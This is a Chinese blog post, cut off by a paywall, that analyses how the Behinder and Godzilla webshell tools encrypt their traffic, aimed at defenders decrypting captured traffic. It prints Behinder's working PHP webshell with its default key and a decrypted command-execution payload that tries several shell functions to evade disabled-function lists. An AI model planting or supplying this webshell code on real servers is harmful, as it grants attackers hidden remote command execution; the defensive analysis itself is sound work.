流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

冰蝎与哥斯拉加密方式解析与解密脚本
最新推荐文章于 2025-10-16 17:11:47 发布
原创 最新推荐文章于 2025-10-16 17:11:47 发布 · 2.5k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言 #网络安全 #经验分享

本文深入分析了冰蝎和哥斯拉的加解密机制,包括PHP、ASP、C#、Java等不同平台的加密方式,并提供了简易解密脚本。冰蝎主要使用AES和异或,而哥斯拉则提供多种加密选项,如AES、XOR等,解密时需考虑首尾填充位。解密脚本可用于行动中帮助解密通信数据。

一、引言

某行动在即,本文基于冰蝎Behinder_v3.0.11和哥斯拉v4.00-godzilla,对它们的加解密方式进行识别和分析【附简易解密脚本】,希望能在行动中助大家一臂之力。

二、冰蝎

冰蝎加密机制,通过阅读代码可知分为四类,即jsp,php,aspx,asp。

 2.1 PHP 

阅读php木马脚本:


<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
  $_SESSION['k']=$key;
  session_write_close();
  $post=file_get_contents("php://input");
  if(!extension_loaded('openssl'))
  {
    $t="base64_"."decode";
    $post=$t($post."");
    
    for($i=0;$i<strlen($post);$i++) {
           $post[$i] = $post[$i]^$key[$i+1&15]; 
          }
            echo "no openssl";
  }
  else
  {
    $post=openssl_decrypt($post, "AES128", $key);
  }
  // echo $post;
  // echo "------------------";
    $arr=explode('|',$post);
    // echo $arr[1];
    // echo "------------------";
    $func=$arr[0];
    $params=$arr[1];
  class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

阅读代码可知,在有openssl的情况下冰蝎会使用openssl进行aes128解密,在没有的情况下使用异或解密。

以一次cmd执行为例进行分析为例:

抓取请求进行AES128解密,得到如下代码,与冰蝎源码中的php payload互相对应:


@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd,$path)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    $result
最低0.47元/天 解锁文章
网络攻击之-Webshell流量告警运营分析
村中少年的专栏
01-01 2194
通过流量数据包从webshell上传,webshell注入,webshell连接通信,Webshell工具利用的角度进行阐述Webshell的防御,告警研判以及处置建议
常见webshell流量分析
学生
06-27 2363
鐜鍙橀噺:
哥斯拉还原加密流量
热门推荐
u011250160的博客
09-28 2万+
感谢大佬的文章:哥斯拉Godzilla加密流量分析 首先在自己的网站上上传个马 设置好代理,方便burp抓包 注意以下为PHP_XOR_BASE64加密的数据包 一共抓到了三个包 第一个包 第二个包 第三个包 第一个包 Request解密脚本 <?php function encode($D,$K){ for($i=0;$i<strlen($D);$i++){ $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c;
WAF攻防-菜刀&冰蝎&哥斯拉&流量通讯&特征绕过&检测反制&感知
今天是几号的博客
04-12 1974
使用Proxifier进行流量转发至Burp抓包分析(使用Wireshake也可以)# ==冰蝎3-流量&绕过&特征&检测== **面试必问的,别问我怎么知道的** 冰蝎利用了服务器端的脚本语言加密功能,通讯的过程中, 消息体内容采用 AES 加密,基于特征值检测的安全产品无法查出 ## 特征 密钥使用连接密码的md5结果的前16位 如果对方使用的默认密码rebeyond,那么密钥就是e45e329feb5d925b,那么这也算是一个特征
资深黑客和运维都在用的Wireshark!手把手教你解密网络流量(超详细)教程!
最新发布
wholeliubei的博客
10-16 1038
本文详细介绍了Wireshark网络分析工具的使用方法,包括软件安装、界面功能、抓包操作和过滤器设置。主要内容有:1)Wireshark安装步骤及兼容性问题解决;2)通过ping命令演示基本抓包流程;3)界面功能分区说明,重点介绍了数据包详细信息面板;4)两种过滤器(抓包过滤器和显示过滤器)的使用方法及语法规则,包括协议、IP、端口等过滤条件设置。文章还提供了《Wireshark从入门到精通》学习资料获取方式,帮助读者快速掌握这款网络封包分析工具。
流量分析-哥斯拉
mrx56的博客
08-04 1264
所以特征也类似,除了raw形式传输的类型弱特征:pass字段、Accept字段、UA、以based64传输数据(若选择raw方式则不会有此特征)强特征:1.首次请求的固定三个数据包,不论哪种类型的shell哥斯拉在刚开始都会发起这三个请求。(第一个请求包数据很大,响应包空并设置sessionid;第二个第三个请求都会携带cookie且有响应数据);2.cookie后分号;
常见Webshell&重大漏洞的流量特征(解密流量工具)
Python_0011的博客
11-10 9157
攻防演练中,经常会看到一些加密流量,又分不清楚是不是误报,本文总结了一些常见的流量特征,流量解密工具。
webshell流量一键解密——webshellDecrypt
土豆的博客
10-19 9640
支持常见webshell流量一键解密(完美兼容php)、AES专项解密(内置50wKey爆破)、各类单项解密(Base64、Rot13、strRev、Chr等)、自定义Js解密
主流Webshell工具流量特征隐蔽技术分析
Webshell流量特征分析网络安全领域中极为关键的一环,尤其是在当前APT攻击、持久化渗透和隐蔽后门泛滥的背景下,深入理解各类主流Webshell工具的通信行为、加密机制网络流量特征,对于企业安全防护、入侵检测...
哥斯拉WebShell流量特征解密技术深度分析
哥斯拉(Godzilla)是一款近年来在网络安全领域广受关注的WebShell管理工具,其作为继“菜刀”、“蚁剑”、“冰蝎”之后的新一代WebShell客户端,在渗透测试红队行动中扮演着重要角色。本文围绕“哥斯拉流量分析...
黑客 Webshell 工具流量特征&解密,零基础入门到精通,收藏这篇就够了_webshell流量解密
喜欢Python编程的程序员柚柚呀
04-11 617
主机名IP账号环境win10内网A01PHPstudyphp一句话木马菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。支持动态脚本‍这段 PHP 代码主要进行了错误显示关闭、脚本执行时间无限制设置,对于 PHP 版本小于 5.3.0 的情况关闭魔术引号运行时设置,然后尝试打开指定目录并读取其中文件和子目录的信息并输出,最后输出特定字符串后终止脚本
kingkong:解密哥斯拉webshell管理工具流量
04-16
kingkong 解密哥斯拉Godzilla-V2.96 webshell管理工具流量 目前只支持jsp类型的webshell流量解密 Usage 获取攻击者上传到服务器的webshell样本 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员获取,这里以test.papng为例。 导出所有http对象,放置到文件夹 编辑kingkong.py脚本,找到#config这行,配置获取到的样本password、key,以及刚才的文件夹路径 py -2 kingkong.py Config #config #配置webshell的key key = '3c6e0b8a9c15224a' #配置webshell的password password = 'pass' #配置wireshark导出http对象的路径 filepath = '.' #配置是否为jsp+b
破解webshell密码
08-12
破解webshell密码本人手机整理
常见webshell流量解密分析
toto的博客
09-10 3714
CobalStrike流量,冰蝎流量,哥斯拉流量,蚁剑/菜刀流量解密过程解析
黑客 Webshell 工具流量特征&解密,零基础入门到精通,收藏这篇就够了
Python_paipai的博客
11-30 860
在客户端生成 shell 时可设置参数,包括作为 Post 请求参数名且用于加密运算的密码、其 md5 值取前 16 位用于加密请求数据的密钥、有 ASP 等四种类型的有效载荷、base64 等三大类加密器,还有用于自定义 HTTP 请求头和在请求数据前后追加以降低流量特征的扰乱数据。这段代码看起来是一段具有恶意意图的 PHP 脚本,它通过一系列复杂操作试图绕过服务器的安全限制(如关闭错误显示、突破 open_basedir 限制等),并根据 POST 请求传入的内容执行命令,同时对输出进行处理后返回。
加密流量分析:破解加密通信,揭示隐藏在网络流量中的威胁
图幻未来的博客
02-20 962
加密通讯的基本原理是将原始数据进行编码(加密)并通过一定的密钥传输给接收方解压缩并还原成明文形式. 常见的加密算法定有对称式和非对称式的加密方法两种类型. 对称密码如AES、DES等使用同一个秘钥进行加密解密操作;非对称性加密采用公私密钥体系结构确保数据安全, 如RSA 和ECC 等.由于加密的复杂性 ,只有专业安全团队才能完全解析它。但幸运的是,一些开源工具和框架使得非专业人士也可以分析和检测这些复杂的网络活动。**3.1 流分析器:**
常见Webshell&重大漏洞的流量特征(解密流量工具),从零基础到精通,收藏这篇就够了!
leah126的博客
04-16 1036
实战攻防,流量分析绝对是绕不开的坎。但说实话,满屏加密流量,是救命稻草还是误报陷阱,真不好说。这篇文章,咱们就来扒一扒那些年我们追过的“加密流量”,顺便分享几个解密小工具,希望能帮你拨开云雾见月明。
webshell工具-冰蝎流量特征和加密方式
qq_40898302的博客
05-25 2818
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。
webshell流量分析
qq_61740845的博客
11-28 1480
冰蝎内置了17种ua头,每次连接shell都会随机一个进行使用,如果发现历史流量中同一个IP访问URL的时候,命令了以下列表中的多个ua头,可以基本确定为冰蝎。(img-1eSYCSDC-1732796753166)]\TP\image-20241128195740195.png)2)服务器使用随机数 MD5 的高16位作为密钥,存储到会话的 $_SESSION 变量中,并返回密钥给攻击者。1)客户端把待执行命令作为输入,利用 AES 算法或 XOR 运算进行加密,并发送至服务端;
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值